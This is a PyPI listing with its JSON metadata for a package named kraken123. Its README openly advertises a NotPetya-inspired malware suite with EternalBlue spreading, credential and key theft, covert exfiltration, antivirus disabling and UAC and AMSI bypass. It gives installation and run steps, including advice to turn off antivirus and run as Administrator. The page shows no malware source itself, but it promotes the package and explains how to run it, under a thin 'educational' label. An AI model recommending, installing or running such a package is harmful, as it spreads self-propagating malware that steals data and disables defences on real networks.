kraken123


Namekraken123 JSON
Version 0.5.0 PyPI version JSON
download
home_pageNone
SummaryA virus package FOR EDUCATIONAL PURPOSES ONLY
upload_time2025-09-14 20:38:37
maintainerNone
docs_urlNone
authorNone
requires_pythonNone
licenseNone
keywords kraken virus security
VCS
bugtrack_url
requirements No requirements were recorded.
Travis-CI No Travis.
coveralls test coverage No coveralls.
            # Kraken-Virus

A sophisticated malware research suite inspired by NotPetya, engineered with enhanced capabilities and superior operational effectiveness for advanced cybersecurity analysis and academic study.

## Key Features

### 🔷 Exploitation & Propagation
- **EternalBlue Exploit (MS17-010)**: Full implementation of the SMB vulnerability for lateral movement and network-based propagation.
- **Multi-Vector Propagation**: Automated spreading mechanisms across networks, removable USB drives, and email communication systems.

### 🔷 Persistence & Stealth
- **Advanced Persistence Mechanisms**: Registry modifications, service installations, scheduled tasks, and boot sector manipulation for sustained execution.
- **Polymorphic Engine**: Code that alters its own signature to evade static detection methods.
- **Anti-Detection Techniques**: Environmental awareness, sandbox evasion, and debugging resistance.

### 🔷 Data Collection & Exfiltration
- **Sensitive Data Harvesting**: Comprehensive collection of credentials, documents, browser history, and cryptographic keys.
- **Stealthy Exfiltration**: Encrypted data transmission using multiple protocols and covert channels.

### 🔷 Defense Evasion
- **Security Tool Disabling**: Identification and termination of antivirus processes, intrusion detection systems, and security services.
- **Bypass Techniques**: UAC bypass, AMSI patching, and trust mechanism exploitation.

---

### 🔷 TO EXECUTE:

### Run a Virtual Machine and disconnect from network or wifi (Mandatory)
**you will need to run the code in a Virtual Machine because it can infect your computer by network or wifi**

#### Prerequisites:
1. **Python 3.6+** installed on your system.  
   Download: [Python Official Website](https://www.python.org/downloads/)  
   ⚠️ Ensure you check **"Add Python to PATH"** during installation.

2. **Git** (optional, for cloning repositories).  
   Download: [Git Official Website](https://git-scm.com/downloads)

---

#### Step-by-Step Guide:

##### 1. Clone or Download the Script:
   - If the script is in a Git repository, clone it:  
     ```bash
     git clone <repository_url>
     cd <repository_directory>
     ```
   - If you have the `kraken.py` file directly, place it in a dedicated folder.

##### 2. Install Dependencies:
   Open **Command Prompt** or **PowerShell** in the script's directory and run:
   ```bash
   pip install impacket cryptography pywin32
   ```
   - `impacket` for SMB/NTLM operations.
   - `cryptography` for encryption (Fernet).
   - `pywin32` for Windows API interactions (win32api, win32security, etc.).

##### 3. Run the Script:
   Execute the script with Python:
   ```bash
   python kraken.py
   ```

---

#### ⚠️ Notes:
- **Antivirus Warnings**: Some security tools may flag parts of the script (e.g., use of `pywin32` or `impacket`). Temporarily disable AV if needed (use at your own risk).
- **Admin Privileges**: The script may require elevated permissions to access Windows registry or system files. Run PowerShell/CMD as **Administrator**.
- **Network Operations**: Ensure firewalls allow SMB/HTTP traffic if the script interacts with networks.

---

#### 🔧 Troubleshooting:
- **Module Not Found Error**: Reinstall missing modules with `pip install <module_name>`.
- **Python Path Issues**: Ensure Python is in your system PATH. Verify with:  
  ```bash
  python --version
  ```
- **Windows Dependencies**: For `pywin32`, if errors persist, use the official `.exe` installer: [pywin32 releases](https://github.com/mhammond/pywin32/releases).

---

#### 📦 Manual Dependency Installation (if pip fails):
1. **Impacket**:  
   ```bash
   git clone https://github.com/SecureAuthCorp/impacket.git
   cd impacket
   pip install .
   ```
2. **PyWin32**:  
   Download the compatible `.whl` file from [here](https://www.lfd.uci.edu/~gohlke/pythonlibs/#pywin32), then install via:  
   ```bash
   pip install <downloaded_whl_file>
   ```

---

### 🚀 Execution:
After dependencies are installed, run:  
```bash
python kraken.py
```


            

Raw data

            {
    "_id": null,
    "home_page": null,
    "name": "kraken123",
    "maintainer": null,
    "docs_url": null,
    "requires_python": null,
    "maintainer_email": null,
    "keywords": "kraken, virus, security",
    "author": null,
    "author_email": "bluecode2 <bl00xkidd@gmail.com>",
    "download_url": "https://files.pythonhosted.org/packages/fc/68/a7f66de3024bc6de81acf2f97a22b7e06225ad7a003c60fb82f9d5ed52b1/kraken123-0.5.0.tar.gz",
    "platform": null,
    "description": "# Kraken-Virus\n\nA sophisticated malware research suite inspired by NotPetya, engineered with enhanced capabilities and superior operational effectiveness for advanced cybersecurity analysis and academic study.\n\n## Key Features\n\n### \ud83d\udd37 Exploitation & Propagation\n- **EternalBlue Exploit (MS17-010)**: Full implementation of the SMB vulnerability for lateral movement and network-based propagation.\n- **Multi-Vector Propagation**: Automated spreading mechanisms across networks, removable USB drives, and email communication systems.\n\n### \ud83d\udd37 Persistence & Stealth\n- **Advanced Persistence Mechanisms**: Registry modifications, service installations, scheduled tasks, and boot sector manipulation for sustained execution.\n- **Polymorphic Engine**: Code that alters its own signature to evade static detection methods.\n- **Anti-Detection Techniques**: Environmental awareness, sandbox evasion, and debugging resistance.\n\n### \ud83d\udd37 Data Collection & Exfiltration\n- **Sensitive Data Harvesting**: Comprehensive collection of credentials, documents, browser history, and cryptographic keys.\n- **Stealthy Exfiltration**: Encrypted data transmission using multiple protocols and covert channels.\n\n### \ud83d\udd37 Defense Evasion\n- **Security Tool Disabling**: Identification and termination of antivirus processes, intrusion detection systems, and security services.\n- **Bypass Techniques**: UAC bypass, AMSI patching, and trust mechanism exploitation.\n\n---\n\n### \ud83d\udd37 TO EXECUTE:\n\n### Run a Virtual Machine and disconnect from network or wifi (Mandatory)\n**you will need to run the code in a Virtual Machine because it can infect your computer by network or wifi**\n\n#### Prerequisites:\n1. **Python 3.6+** installed on your system.  \n   Download: [Python Official Website](https://www.python.org/downloads/)  \n   \u26a0\ufe0f Ensure you check **\"Add Python to PATH\"** during installation.\n\n2. **Git** (optional, for cloning repositories).  \n   Download: [Git Official Website](https://git-scm.com/downloads)\n\n---\n\n#### Step-by-Step Guide:\n\n##### 1. Clone or Download the Script:\n   - If the script is in a Git repository, clone it:  \n     ```bash\n     git clone <repository_url>\n     cd <repository_directory>\n     ```\n   - If you have the `kraken.py` file directly, place it in a dedicated folder.\n\n##### 2. Install Dependencies:\n   Open **Command Prompt** or **PowerShell** in the script's directory and run:\n   ```bash\n   pip install impacket cryptography pywin32\n   ```\n   - `impacket` for SMB/NTLM operations.\n   - `cryptography` for encryption (Fernet).\n   - `pywin32` for Windows API interactions (win32api, win32security, etc.).\n\n##### 3. Run the Script:\n   Execute the script with Python:\n   ```bash\n   python kraken.py\n   ```\n\n---\n\n#### \u26a0\ufe0f Notes:\n- **Antivirus Warnings**: Some security tools may flag parts of the script (e.g., use of `pywin32` or `impacket`). Temporarily disable AV if needed (use at your own risk).\n- **Admin Privileges**: The script may require elevated permissions to access Windows registry or system files. Run PowerShell/CMD as **Administrator**.\n- **Network Operations**: Ensure firewalls allow SMB/HTTP traffic if the script interacts with networks.\n\n---\n\n#### \ud83d\udd27 Troubleshooting:\n- **Module Not Found Error**: Reinstall missing modules with `pip install <module_name>`.\n- **Python Path Issues**: Ensure Python is in your system PATH. Verify with:  \n  ```bash\n  python --version\n  ```\n- **Windows Dependencies**: For `pywin32`, if errors persist, use the official `.exe` installer: [pywin32 releases](https://github.com/mhammond/pywin32/releases).\n\n---\n\n#### \ud83d\udce6 Manual Dependency Installation (if pip fails):\n1. **Impacket**:  \n   ```bash\n   git clone https://github.com/SecureAuthCorp/impacket.git\n   cd impacket\n   pip install .\n   ```\n2. **PyWin32**:  \n   Download the compatible `.whl` file from [here](https://www.lfd.uci.edu/~gohlke/pythonlibs/#pywin32), then install via:  \n   ```bash\n   pip install <downloaded_whl_file>\n   ```\n\n---\n\n### \ud83d\ude80 Execution:\nAfter dependencies are installed, run:  \n```bash\npython kraken.py\n```\n\n",
    "bugtrack_url": null,
    "license": null,
    "summary": "A virus package FOR EDUCATIONAL PURPOSES ONLY",
    "version": "0.5.0",
    "project_urls": {
        "Homepage": "https://github.com/bluecodeyt12-maker/Kraken-Virus",
        "Issues": "https://github.com/bluecodeyt12-maker/Kraken-Virus/issues",
        "Repository": "https://github.com/bluecodeyt12-maker/Kraken-Virus"
    },
    "split_keywords": [
        "kraken",
        " virus",
        " security"
    ],
    "urls": [
        {
            "comment_text": null,
            "digests": {
                "blake2b_256": "a58558412940ea95514a13b8fd1c6219b398d3b09509a3ff6a92cd7870d06177",
                "md5": "dfbee50f4ea0dcd76aedace36077abcc",
                "sha256": "6e96a1a27adff4759af0724be47405140e259e99bd52c1fb8652feae177d76bb"
            },
            "downloads": -1,
            "filename": "kraken123-0.5.0-py3-none-any.whl",
            "has_sig": false,
            "md5_digest": "dfbee50f4ea0dcd76aedace36077abcc",
            "packagetype": "bdist_wheel",
            "python_version": "py3",
            "requires_python": null,
            "size": 42209,
            "upload_time": "2025-09-14T20:38:35",
            "upload_time_iso_8601": "2025-09-14T20:38:35.590589Z",
            "url": "https://files.pythonhosted.org/packages/a5/85/58412940ea95514a13b8fd1c6219b398d3b09509a3ff6a92cd7870d06177/kraken123-0.5.0-py3-none-any.whl",
            "yanked": false,
            "yanked_reason": null
        },
        {
            "comment_text": null,
            "digests": {
                "blake2b_256": "fc68a7f66de3024bc6de81acf2f97a22b7e06225ad7a003c60fb82f9d5ed52b1",
                "md5": "23a186bbb0a362b034b868bf5e60b0ac",
                "sha256": "b4168b74409b3f72507229b7a47ff93fb21d58883e191f54de14dcbf86adf682"
            },
            "downloads": -1,
            "filename": "kraken123-0.5.0.tar.gz",
            "has_sig": false,
            "md5_digest": "23a186bbb0a362b034b868bf5e60b0ac",
            "packagetype": "sdist",
            "python_version": "source",
            "requires_python": null,
            "size": 44536,
            "upload_time": "2025-09-14T20:38:37",
            "upload_time_iso_8601": "2025-09-14T20:38:37.097770Z",
            "url": "https://files.pythonhosted.org/packages/fc/68/a7f66de3024bc6de81acf2f97a22b7e06225ad7a003c60fb82f9d5ed52b1/kraken123-0.5.0.tar.gz",
            "yanked": false,
            "yanked_reason": null
        }
    ],
    "upload_time": "2025-09-14 20:38:37",
    "github": true,
    "gitlab": false,
    "bitbucket": false,
    "codeberg": false,
    "github_user": "bluecodeyt12-maker",
    "github_project": "Kraken-Virus",
    "travis_ci": false,
    "coveralls": false,
    "github_actions": true,
    "lcname": "kraken123"
}
        
Elapsed time: 2.89225s